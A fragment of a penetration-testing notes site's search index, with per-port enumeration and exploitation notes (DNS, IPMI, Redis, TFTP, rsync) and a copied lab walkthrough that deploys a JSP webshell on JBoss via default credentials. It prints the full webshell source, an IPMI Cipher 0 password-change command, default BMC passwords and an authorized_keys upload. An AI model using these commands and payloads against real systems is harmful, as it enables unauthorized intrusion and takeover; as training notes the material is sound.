                        A list of vulnerabilities targeting the BIND9 server can be found at CVEdetails. In addition, SecurityTrails provides a short list of the most popular attacks on DNS servers.

                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#footprinting-dns","title":"Footprinting DNS","text":"

                        See nslookup.

                        # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n

                        See dig.

                        # Querying: A Records for a Subdomain\n dig a www.example @$ip\n # here, $ip refers to ip of DNS server\n\n# Get email of administrator of the domain\ndig soa www.example.com\n# The email will contain a (.) dot notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# -ns: other name servers are known in NS record\n#  `@` character specifies the DNS server we want to query.\n# here, $ip refers to ip of DNS server\n\n# View all available records\ndig any example.com @$ip\n # here, $ip refers to ip of DNS server. The more recent RFC8482 specified that `ANY` DNS requests be abolished. Therefore, we may not receive a response to our `ANY` request from the DNS server.\n\n# Display version. query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n\n# Querying: PTR Records for an IP Address\ndig -x $ip @1.1.1.1\n\n# Querying: TXT Records\ndig txt example.com @$ip\n\n# Querying: MX Records\ndig mx example.com @1.1.1.1\n

                        Transfer a zone (more on dig axfr)

                        dig axfr example.htb @$ip\n

                        If the administrator used a subnet for the allow-transfer option for testing purposes or as a workaround solution or set it to any, everyone would query the entire zone file at the DNS server.

                        Another tools for transferring zones:

                        Fierce:

                        # Perform a dns transfer using a wordlist againts domain.com\nfierce -dns domain.com \n

                        dnsenum:

                        dnsenum domain.com\n# additionally it performs DNS brute force with /usr/share/dnsenum/dns.txt.\n
                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#subdomain-brute-enumeration","title":"Subdomain brute enumeration","text":"

                        Using Sec wordlist:

                        for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n
                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#tools-for-passive-enumeration","title":"Tools for passive enumeration","text":"Tool + Cheat sheet What it does Google dorks Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Sublist3r Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. crt.sh It collects information about SSL certificates. If you visit a domain and it contains a certificate you can extract other subdomain by using the View Certificate functionality. dnscan Python wordlist-based DNS subdomain scanner. DNSRecon Preinstalled with Linux: dsnrecon is a simple python script that enables to gather DNS-oriented information on a given target. dnsdumpster.com DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers perspective is an important part of the security assessment process.","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#tools-for-active-enumeration","title":"Tools for active enumeration","text":"Tool + Cheat sheet What it does dnsenum multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. dig discover non-contiguous ip blocks. fierce DNS scanner that helps locate non-contiguous IP space and hostnames. dnscan Python wordlist-based DNS subdomain scanner. gobuster For brute force enumerations. nslookup . amass In depth DNS Enumeration and network mapping.","tags":["scanning","domain","subdomain","pentesting"]},{"location":"5432-postgresql/","title":"5432 postgreSQL","text":"

                        https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql.

                        ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#description","title":"Description","text":"

                        In some cases, the default service that runs on TCP port 5432 is PostgreSQL, which is a database management system: creating, modifying, and updating databases, changing and adding data, and more. PostgreSQL can typically be interacted with using a command-line tool called psql.

                        psql\n
                        ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#installation","title":"Installation","text":"","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#linux","title":"Linux","text":"

                        If the tool is not installed, then run:

                        sudo apt install postgresql-client-common\n

                        If your user is not in the sudoers file, we can do some workarounds about it. Some options arise here:

                        -uploading static binaries onto the target machine, -port-forwarding, or tunneling, using SSH.

                        Using SSH and postgresql:

                        1. In the attacking machine:

                        ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432 \n# We will listen for incoming connections on our local port 1234. When a client connects to our local port, the SSH client will forward the connection to the remote server on port 22. This allows the local client to access services on the remote server as if they were running on the local machine.\n# We are forwarding traffic from any given local port, for instance 1234, to the port on which PostgreSQL is listening, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.\n

                        2. In another terminal in the attacking machine:

                        sudo apt update && sudo apt install postgresql postgresql-client-common \n# this will install postgresql in case you don't have it.\n\npsql -U christine -h localhost -p 1234\n# Using our installation of psql, we can now interact with the PostgreSQL service running locally on the target machine:\n# -U: to specify user.\n# -h: to specify localhost. \n# -p 1234 as we are targeting the tunnel we created earlier with SSH, we need to specify which is the port the tunnel is listening on.\n
                        ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#powershell","title":"Powershell","text":"
                        Install-Module PostgreSQLCmdlets\n
                        ","tags":["postgresql","port 5432"]},{"location":"5432-postgresql/#basics-commands-in-postgresql","title":"Basics commands in postgresql","text":"
                        # List databases\n# Short version: \\l\n\\list\n\n# Connect to a database\n# Short version: \\c NameOfDataBase\n\\connect NameOfDatabase\n\n# List database tables (once you have selected a database)\n\\dt\n\n# Dump content from a column\nSELECT * FROM NameOfColumn;\n# Watch out! Case sensitive\n
                        ","tags":["postgresql","port 5432"]},{"location":"55007-55008-dovecot/","title":"55007 - 55008 dovecot","text":"","tags":["dovecot","port 55007","port 55008"]},{"location":"55007-55008-dovecot/#dovecot","title":"dovecot","text":"

                        You can connect with a dovecot server using the telnet protocol.

                        telnet IP port\n# Example: telnet 192.168.56.101 55007\n
                        ","tags":["dovecot","port 55007","port 55008"]},{"location":"55007-55008-dovecot/#basic-commands","title":"Basic commands","text":"
                        # Enter the username to login\nUSER username\n\n# Enter password\nPASS secretword\n\n# Now, you are logged in and you can list message on the server for that user\nLIST\n\n# And you can read them using their id (id is a number=\nRETR id\n\n# You might be able to delete them\nDELE id\n
                        ","tags":["dovecot","port 55007","port 55008"]},{"location":"5985-5986-winrm-windows-remote-management/","title":"Port 5985, 5986 - WinRM - Windows Remote Management","text":"

                        How is WinRM different from Remote Desktop (RDP)? WinRM is a protocol for remote management, while Remote Desktop (RDP) is a protocol for remote desktop access. WinRM allows for remote execution of management commands, while RDP provides a graphical interface for remote desktop access.

                        WinRM is part of the operating system. However, to obtain data from remote computers, you must configure a WinRM listener.

                        WinRM is a network protocol based on XML web services using the Simple Object Access Protocol (SOAP) used for remote management of Windows systems. It takes care of the communication between Web-Based Enterprise Management (WBEM) and the Windows Management Instrumentation (WMI), which can call the Distributed Component Object Model (DCOM).WinRM uses the Simple Object Access Protocol (SOAP) to establish connections to remote hosts and their applications. However, for security reasons, WinRM must be activated and configured manually in Windows 10. WinRM uses the TCP ports 5985 (HTTP) and 5986 (HTTPS).

                        Another component that fits WinRM for administration is Windows Remote Shell (WinRS), which lets us execute arbitrary commands on the remote system. The program is even included on Windows 7 by default.

                        ","tags":["tools","port 5985","port 5986","winrm"]},{"location":"5985-5986-winrm-windows-remote-management/#footprinting-winrm","title":"Footprinting winrm","text":"

                        As we already know, WinRM uses TCP ports 5985 (HTTP) and 5986 (HTTPS) by default, which we can scan using Nmap:

                        nmap -sV -sC $ip -p5985,5986 --disable-arp-ping -n\n

                        We'll connect to the WinRM service on the target and try to get a session. Because PowerShell isn't installed on Linux by default, we'll use a tool called Evil-WinRM which is made for this kind of scenario.

                        evil-winrm -i $ip -u <username> -p <password>\n

                        For windows, we can use The Test-WsMan cmdlet.

                        ","tags":["tools","port 5985","port 5986","winrm"]},{"location":"623-intelligent-platform-management-interface-ipmi/","title":"623 - Intelligent Platform Management Interface (IPMI)","text":"

                        Intelligent Platform Management Interface (IPMI) is a system management tool that provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state. It operates using a direct network connection to the system's hardware and does not require access to the operating system via a login shell. IPMI can also be used for remote upgrades to systems without requiring physical access to the target host. IPMI communicates over port 623 UDP. IPMI is typically used in three ways:

                        • Before the OS has booted to modify BIOS settings
                        • When the host is fully powered down
                        • Access to a host after a system failure
                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#footprinting-ipmi","title":"Footprinting ipmi","text":"

                        Many Baseboard Management Controllers (BMCs) (including HP iLO, Dell DRAC, and Supermicro IPMI) expose a web-based management console, some sort of command-line remote access protocol such as Telnet or SSH, and the port 623 UDP, which, again, is for the IPMI network protocol.

                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#discovery","title":"Discovery","text":"
                        nmap -n -p 623 10.0.0./24\nnmap -n-sU -p 623 10.0.0./24\nuse  auxiliary/scanner/ipmi/ipmi_version\n
                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#version","title":"Version","text":"
                         sudo nmap -sU --script ipmi-version -p 623 <hostname/IP>\n

                        Metasploit scanner module IPMI Information Discovery (auxiliary/scanner/ipmi/ipmi_version): this module discovers host information through IPMI Channel Auth probes:

                        use auxiliary/scanner/ipmi/ipmi_version\n\nshow actions ...actions... msf \nset ACTION < action-name > msf \nshow options \n# and set needed options\nrun\n

                        We might find BMCs where the administrators have not changed the default password:

                        Product Username Password Dell Remote Access Card (iDRAC, DRAC) root calvin HP Integrated Lights Out (iLO) Administrator randomized 8-character string consisting of numbers and uppercase letters Supermicro IPMI (2.0) ADMIN ADMIN IBM Integrated Management Module (IMM) USERID PASSW0RD (with a zero) Fujitsu Integrated Remote Management Controller admin admin Oracle/Sun Integrated Lights Out Manager (ILOM) root changeme ASUS iKVM BMC admin admin

                        These default passwords may gain us access to the web console or even command line access via SSH or Telnet.

                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#vulnerability-ipmi-authentication-bypass-via-cipher-0","title":"Vulnerability - IPMI Authentication Bypass via Cipher 0","text":"

                        Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.

                        use auxiliary/scanner/ipmi/ipmi_cipher_zero\n

                        Abuse this flaw with ipmitool:

                        # Install\napt-get install ipmitool \n\n# Use Cipher 0 to dump a list of users. With -C 0 any password is accepted\nipmitool -I lanplus -C 0 -H $ip -U root -P root user list \n\n# Change the password of root\nipmitool -I lanplus -C 0 -H $ip -U root -P root user set password 2 abc123 \n
                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#ipmi-20-rakp-remote-sha1-password-hash-retrieval","title":"IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval","text":"

                        If default credentials do not work to access a BMC, we can turn to a flaw in the RAKP protocol in IPMI 2.0. During the authentication process, the server sends a salted SHA1 or MD5 hash of the user's password to the client before authentication takes place.

                        Metasploit module:

                        This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.

                        use auxiliary/scanner/ipmi/ipmi_dumphashes\n\nshow actions\n\nset ACTION < action-name >\n\nshow options\n# set <options>\n\nrun\n

                        Hashcat:

                        hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u\n
                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#how-does-ipmi-work","title":"How does IPMI work","text":"

                        IPMI can monitor a range of different things such as system temperature, voltage, fan status, and power supplies. It can also be used for querying inventory information, reviewing hardware logs, and alerting using SNMP. The host system can be powered off, but the IPMI module requires a power source and a LAN connection to work correctly.

                        Systems using IPMI version 2.0 can be administered via serial over LAN, giving sysadmins the ability to view serial console output in band. To function, IPMI requires the following components:

                        • Baseboard Management Controller (BMC) - A micro-controller and essential component of an IPMI
                        • Intelligent Chassis Management Bus (ICMB) - An interface that permits communication from one chassis to another
                        • Intelligent Platform Management Bus (IPMB) - extends the BMC
                        • IPMI Memory - stores things such as the system event log, repository store data, and more
                        • Communications Interfaces - local system interfaces, serial and LAN interfaces, ICMB and PCI Management Bus.

                        Baseboard Management Controllers (BMCs): Systems that use the IPMI protocol.

                        BMCs are built into many motherboards but can also be added to a system as a PCI card. Most servers either come with a BMC or support adding a BMC. The most common BMCs we often see during internal penetration tests are HP iLO, Dell DRAC, and Supermicro IPMI.

                        If we can access a BMC during an assessment, we would gain full access to the host motherboard and be able to monitor, reboot, power off, or even reinstall the host operating system. Gaining access to a BMC is nearly equivalent to physical access to a system.

                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"623-intelligent-platform-management-interface-ipmi/#resources","title":"Resources","text":"
                        • hacktricks: https://book.hacktricks.xyz/network-services-pentesting/623-udp-ipmi
                        ","tags":["intelligent platform management interface","port 623","ipmi","bcm"]},{"location":"6379-redis/","title":"6379 redis","text":"","tags":["redis","port 6379"]},{"location":"6379-redis/#description","title":"Description","text":"

                        Redis (REmote DIctionary Server) is an open-source advanced NoSQL key-value data store used as a database, cache, and message broker. The Redis command line interface (redis-cli) is a terminal program used to send commands to and read replies from the Redis server. Redis popularized the idea of a system that can be considered a store and a cache at the same time.Redis is an open-source, in-memory key-value data store. Whether you\u2019ve installed Redis locally or you\u2019re working with a remote instance, you need to connect to it in order to perform most operations.

                        ","tags":["redis","port 6379"]},{"location":"6379-redis/#the-server","title":"The server","text":"

                        Redis runs as server-side software so its core functionality is in its server component. The server listens for connections from clients, programmatically or through the command-line interface.

                        ","tags":["redis","port 6379"]},{"location":"6379-redis/#the-cli","title":"The CLI","text":"

                        The command-line interface (CLI) is a powerful tool that gives you complete access to Redis\u2019s data and its functionalities if you are developing a software or tool that needs to interact with it.

                        ","tags":["redis","port 6379"]},{"location":"6379-redis/#database","title":"Database","text":"

                        The database is stored in the server's RAM to enable fast data access. Redis also writes the contents of the database to disk at varying intervals to persist it as a backup, in case of failure.

                        ","tags":["redis","port 6379"]},{"location":"6379-redis/#install-redis-in-your-kali","title":"Install redis in your kali","text":"","tags":["redis","port 6379"]},{"location":"6379-redis/#prerequisites","title":"Prerequisites","text":"

                        If you're running a very minimal distribution (such as a Docker container) you may need to install lsb-release first:

                        sudo apt install lsb-release\n

                        Add the repository to the apt index, update it, and then install:

                        curl -fsSL https://packages.redis.io/gpg | sudo gpg --dearmor -o /usr/share/keyrings/redis-archive-keyring.gpg\n\necho \"deb [signed-by=/usr/share/keyrings/redis-archive-keyring.gpg] https://packages.redis.io/deb $(lsb_release -cs) main\" | sudo tee /etc/apt/sources.list.d/redis.list\n\nsudo apt-get update\n\nsudo apt-get install redis\n
                        ","tags":["redis","port 6379"]},{"location":"6379-redis/#to-connect-to-a-terminal","title":"To connect to a terminal","text":"

                        First thing to know is that you can use \u201ctelnet\u201d (usually on Redis default port 6379)

                        telnet localhost 6379\n

                        If you have redis-server installed locally, you can connect to the Redis instance with the redis-cli command.

                        If you want to connect to a remote Redis datastore, you can specify its host and port numbers with the -h and -p flags, respectively. Also, if you\u2019ve configured your Redis database to require a password, you can include the -a flag followed by your password in order to authenticate:

                        redis-cli -h host -p port_number -a password\n

                        If you\u2019ve set a Redis password, clients will be able to connect to Redis even if they don\u2019t include the -a flag in their redis-cli command. However, they won\u2019t be able to add, change, or query data until they authenticate. To authenticate after connecting, use the auth command followed by the password:

                        auth password\n

                        If the password passed to auth is valid, the command will return OK. Otherwise, it will return an error.

                        redis-cli -h 10.129.124.88\n

                        Upon a successful connection with the Redis server, we should be able to see a prompt in the terminal as:

                        IP:6379>\n

                        One of the basic Redis enumeration commands is info which returns information and statistics about the Redis server.

                        ","tags":["redis","port 6379"]},{"location":"6379-redis/#dumping-database","title":"Dumping Database","text":"

                        Inside Redis the databases are numbers starting from 0. You can find if anyone is used in the output of the command info inside the \"Keyspace\" chunk:

                        # Keyspace\ndb0:keys=4, expires=0, avg_ttl=0\ndb1:keys=2, expires=0, avg_ttl=0\n

                        Or you can just get all the keyspaces (databases) with:

                        INFO keyspace\n

                        Redis has a concept of separated namespaces called \u201cdatabases\u201d. You can select the database number you want to use with \u201cSELECT\u201d. By default the database with index 0 is used.

                        # Select database\nredis 127.0.0.1:6379> SELECT 1\n\n# To see all keys in a given database. First, you enter in it with \"SELECT <number>\" and then\nredis 127.0.0.1:6379> keys *\n\n# To retrieve a specific key\nredis 127.0.0.1:6379> get flag\n
                        ","tags":["redis","port 6379"]},{"location":"6653-openflow/","title":"6653 Openflow","text":"

                        The OpenFlow protocol operates over TCP, with a default port number of 6653. This protocol operates between an SDN controller and an SDN-controlled switch or other device implementing the OpenFlow API.

                        ","tags":["Openflow","port 6653"]},{"location":"69-tftp/","title":"69 - ftpt","text":"

                        Trivial File Transfer Protocol (TFTP) uses UDP port 69 and requires no authentication\u2014clients read from, and write to servers using the datagram format outlined in RFC 1350. Due to deficiencies within the protocol (namely lack of authentication and no transport security), it is uncommon to find servers on the public Internet. Within large internal networks, however, TFTP is used to serve configuration files and ROM images to VoIP handsets and other devices.

                        You can spot the open port after running a UDP scan. But also, when reading /etc/passwd, you might find service/user tftp.

                        Trivial File Transfer Protocol (TFTP) is a simple protocol that provides basic file transfer function with no user authentication. TFTP is intended for applications that do not need the sophisticated interactions that File Transfer Protocol (FTP) provides.

                        UDP provides a mechanism to detect corrupt data in packets, but it does not attempt to solve other problems that arise with packets, such as lost or out of order packets. It is implemented in the transport layer of the OSI Model, known as a fast but not reliable protocol, unlike TCP, which is reliable, but slower then UDP. Just like how TCP contains open ports for protocols such as HTTP, FTP, SSH and etcetera, the same way UDP has ports for protocols that work for UDP.

                        ","tags":["pentesting"]},{"location":"69-tftp/#enumeration","title":"Enumeration","text":"
                        nmap -n -Pn -sU -p69 -sV --script tftp-enum $ip\n
                        ","tags":["pentesting"]},{"location":"69-tftp/#exploitation","title":"Exploitation","text":"

                        You can use Metasploit or Python to check if you can download/upload files:

                        Module: auxiliary/admin/tftp/tftp_transfer_util

                        Also you can exploit manually. Install tftp client:

                        # Installing a tftp server\nsudo apt-get install tftpd-hpa\n\n# Installing a tftp client\nsudo apt install tftp\n

                        For available commands:

                        man tftp\n

                        Upload your pentesmonkey shell with:

                        put pentesmonkey.php\n

                        Where does it get uploaded? Depends. But The default configuration file for tftpd-hpa is /etc/default/tftpd-hpa. The directory is configured there under the parameter TFTP_DIRECTORY= With that information, you can access the directory and from there launch your reverse shell.

                        ","tags":["pentesting"]},{"location":"69-tftp/#related-labs","title":"Related labs","text":"

                        HackTheBox machine: included.

                        ","tags":["pentesting"]},{"location":"7z/","title":"7z","text":""},{"location":"7z/#installation","title":"Installation","text":"
                        sudo apt install p7zip-full\n
                        "},{"location":"7z/#basic-usage","title":"Basic usage","text":"
                        # Extract file\n7z x ~/archive.7z\n\n# a : Add files to archive\n# b : Benchmark\n# d : Delete files from archive\n# e : Extract files from archive (without using directory names)\n# h : Calculate hash values for files\n# i : Show information about supported formats\n# l : List contents of archive\n# rn : Rename files in archive\n# t : Test integrity of archive\n# u : Update files to archive\n# x : eXtract files with full paths\n
                        "},{"location":"8080-jboss/","title":"8080 JBoss AS Instance 6.1.0","text":"

                        Copied from INE lab: HTML Adapter to Root

                        Step 1:\u00a0Open the lab link to access the Kali GUI instance.

                        Step 2:\u00a0Check if the provided machine/domain is reachable.

                        Command:

                        ping -c3 demo.ine.local\n

                        The provided machine is reachable.

                        Step 3:\u00a0Check open ports on the provided machine.

                        Command:

                        nmap -sS -sV demo.ine.local\n

                        Multiple ports are open on the target machine.

                        Some notable services include Java RMI, Apache Tomcat, and the JBoss application server.

                        What is Java RMI?

                        The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

                        Reference:\u00a0https://docs.oracle.com/javase/tutorial/rmi/index.html

                        What is Apache Tomcat?

                        Apache Tomcat is a free and open-source implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies. It provides a \"pure Java\" HTTP web server environment in which Java code can run.

                        Reference:\u00a0https://en.wikipedia.org/wiki/Apache_Tomcat

                        What is JBoss application server?

                        JBoss application server is an open-source platform, developed by Red Hat, used for implementing Java applications and a wide variety of other software applications. You can build and deploy Java services to be scaled to fit the size of your business.

                        Reference:\u00a0https://www.dnsstuff.com/what-is-jboss-application-server

                        Step 4:\u00a0Check the application served by Apache Tomcat.

                        Open the following URL in the browser:

                        URL:\u00a0http://demo.ine.local:8080

                        Notice that the target is serving the JBoss application server (version 6.1.0).

                        Step 5:\u00a0Access the JMX console.

                        Click on the\u00a0JMX Console\u00a0link:

                        What is JMX?

                        Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean).

                        Reference:\u00a0https://en.wikipedia.org/wiki/Java_Management_Extensions

                        Using the JMX console, we can manage the application and, therefore, alter it to execute malicious code on the target server and gain remote code execution.

                        What is an MBean?

                        An MBean is a managed Java object, similar to a JavaBeans component, that follows the design patterns set forth in the JMX specification. An MBean can represent a device, an application, or any resource that needs to be managed.

                        Reference:\u00a0https://docs.oracle.com/javase/tutorial/jmx/mbeans/index.html

                        Once the JMX Console is clicked, you should be presented with an authentication dialog:

                        Searching online for the default credentials for JBoss:

                        Click on the\u00a0StackOverflow link\u00a0from the results:

                        The default credentials for JBoss web console are:

                        Username:\u00a0admin Password:\u00a0admin

                        Submit these credentials to the authentication dialog:

                        The above credentials were accepted, and the login was successful!

                        You should have access to the\u00a0JMX Agent View\u00a0page now.

                        Using this page, one can manage the deployed applications and even alter them.

                        Step 6:\u00a0Search for the\u00a0MainDeployer\u00a0(JBoss System API).

                        Apply the following filter:

                        Filter:

                        jboss.system*\n

                        Select the entry for\u00a0MainDeployer.

                        Information:\u00a0The MainDeployer service can be used to manage deployments on the JBoss application server. For that reason, this API is quite crucial from a pentester's perspective.

                        Once the\u00a0MainDeployer\u00a0service is selected, you should see the following page:

                        Scroll down to the\u00a0redeploy\u00a0attribute. Make sure the\u00a0redeploy\u00a0attribute accepts a URL as the input (java.net.URL):

                        We will be invoking this method to deploy a malicious JSP application, one that gives us a webshell.

                        Step 7:\u00a0Prepare the payload for deployment.

                        Head over to the following URL:

                        URL:\u00a0https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp

                        Open the code in raw form (click the\u00a0Raw\u00a0button):

                        Copy the payload (press\u00a0CTRL+SHIFT+ALT) and save it as\u00a0backdoor.jsp:

                        <%@ page import=\"java.util.*,java.io.*\"%>\n<%\n//\n// JSP_KIT\n//\n// cmd.jsp = Command Execution (unix)\n//\n// by: Unknown\n// modified: 27/06/2003\n//\n%>\n<HTML><BODY>\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\n    out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n    Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n    OutputStream os = p.getOutputStream();\n    InputStream in = p.getInputStream();\n    DataInputStream dis = new DataInputStream(in);\n    String disr = dis.readLine();\n    while ( disr != null ) {\n        out.println(disr); \n        disr = dis.readLine(); \n        }\n    }\n%>\n</pre>\n</BODY></HTML>\n

                        If the GET request contains the\u00a0cmd\u00a0parameter, the specified command is executed, and the results are displayed on the web page.

                        Generate a WAR (Web Application Resource or Web application ARchive) file for deployment:

                        Commands:

                        jar -cvf backdoor.war backdoor.jsp\nfile backdoor.war\n

                        The payload application is generated.

                        Step 8:\u00a0Deploy the payload application on the target server.

                        Check the IP address of the attacker machine:

                        Command:

                        ip addr\n

                        The IP address of the attacker machine is\u00a0192.166.140.2.

                        Note:\u00a0The IP addresses assigned to the labs are bound to change with every lab run. Kindly replace the IP addresses in the subsequent commands with the one assigned to your attacker machine. Failing to do that would result in failed exploitation attempts.

                        Start a Python-based HTTP server to serve the payload application:

                        Command:

                        python3 -m http.server 80\n

                        Head over to the JMX Console page and under the\u00a0redeploy\u00a0attribute, place the following URL as the parameter:

                        URL:

                        http://192.166.140.2/backdoor.war\n

                        Note:\u00a0Kindly make sure to substitute the correct IP address in the above URL.

                        Once the payload application URL is specified, click on the\u00a0Invoke\u00a0button:

                        The operation was successful, as shown in the above image!

                        Check the terminal where the Python-based HTTP server was running:

                        Notice that there is a request from the target machine for the\u00a0backdoor.war\u00a0file.

                        Step 9:\u00a0Access the webshell and run OS commands.

                        Visit the following URL:

                        URL:

                        http://demo.ine.local:8080/backdoor/backdoor.jsp\n

                        There is a simple webshell.

                        Send the\u00a0id\u00a0command:

                        We are running as\u00a0root!

                        Send the\u00a0pwd\u00a0command:

                        List the files in the current directory (ls -al):

                        That was all for this lab on abusing a misconfigured JBoss application server to access the JMX console (default credentials) and leveraging it to deploy a webshell.

                        To summarize, we performed recon on the target machine to determine the presence of JBoss AS. We found that the JMX console accepted default credentials and leveraged it to deploy a malicious application to execute arbitrary commands on the target server as root.

                        ","tags":["jboss","port 8080"]},{"location":"873-rsync/","title":"873 rsync","text":"","tags":["rsync","port 873"]},{"location":"873-rsync/#description","title":"Description","text":"

                        rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers. It can be used to copy files locally on a given machine and to/from remote hosts. It is highly versatile and well-known for its delta-transfer algorithm. This algorithm reduces the amount of data transmitted over the network when a version of the file already exists on the destination host. It does this by sending only the differences between the source files and the older version of the files that reside on the destination server. It is often used for backups and mirroring. It finds files that need to be transferred by looking at files that have changed in size or the last modified time. By default, it uses port 873 and can be configured to use SSH for secure file transfers by piggybacking on top of an established SSH server connection.

                        ","tags":["rsync","port 873"]},{"location":"873-rsync/#footprinting-rsync","title":"Footprinting rsync","text":"
                        sudo nmap -sV -p 873 $ip\n

                        We can next probe the service a bit to see what we can gain access to:

                        nc -nv $ip 873\n

                        If some share is returned, we could go further by enumerating the share:

                        rsync -av --list-only rsync://$ip$/<nameOfShare>\n

                        nmap script to enumerate shares:

                        nmap -sV --script \"rsync-list-modules\" -p <PORT> $ip\n

                        metasploit module to enumerate shares

                        use auxiliary/scanner/rsync/modules_list\n

                        If IPv6 is in use:

                        # Example using IPv6 and a different port\nrsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730\n
                        ","tags":["rsync","port 873"]},{"location":"873-rsync/#connect-to-the-service","title":"Connect to the service","text":"
                        rsync rsync://IP\n
                        ","tags":["rsync","port 873"]},{"location":"873-rsync/#basic-rsync-commands","title":"Basic rsync commands","text":"

                        General syntax:

                        rsync [OPTION] ... [USER@]HOST::SRC [DEST]\n
                        # List content\nrsync IP::\n\n# List recursively a directory\nrsync -r IP::folder\n\n# Download a file from  the server to your machine\nrsync IP::folder/sourcefile.txt destinationfile.txt    \n\n# Downloa a folder\nrsync -r IP::folder/sourcefile.txt destinationfile.txt   \n
                        ","tags":["rsync","port 873"]},{"location":"873-rsync/#brute-force","title":"Brute force","text":"

                        Once you have the list of modules you have a few different options depending on the actions you want to take and whether or not authentication is required. If authentication is not required you can list a shared folder:

                        rsync -av --list-only rsync://$ip$/<nameOfShared>\n

                        And copy all files to your local machine via the following command:

                        rsync -av rsync://$ip:8730/<nameOfShared>./rsyn_shared\n

                        This recursively transfers all files from the directory <nameOfShared> on the machine $ip into the ./rsync_shared directory on the local machine. The files are transferred in \"archive\" mode, which ensures that symbolic links, devices, attributes, permissions, ownerships, etc. are preserved in the transfer.

                        If you have credentials you can list/download a shared name using (the password will be prompted):

                        rsync -av --list-only rsync://<username>@$ip/<nameOfShared>\nrsync -av \n\nrsync://<username>@$ip$:8730/<nameOfShared> ./rsyn_shared\n

                        You could also upload some content using rsync (for example, in this case we can upload an authorized_keys file to obtain access to the box):

                        rsync -av home_user/.ssh/ rsync://<username>@$ip/home_user/.ssh\n
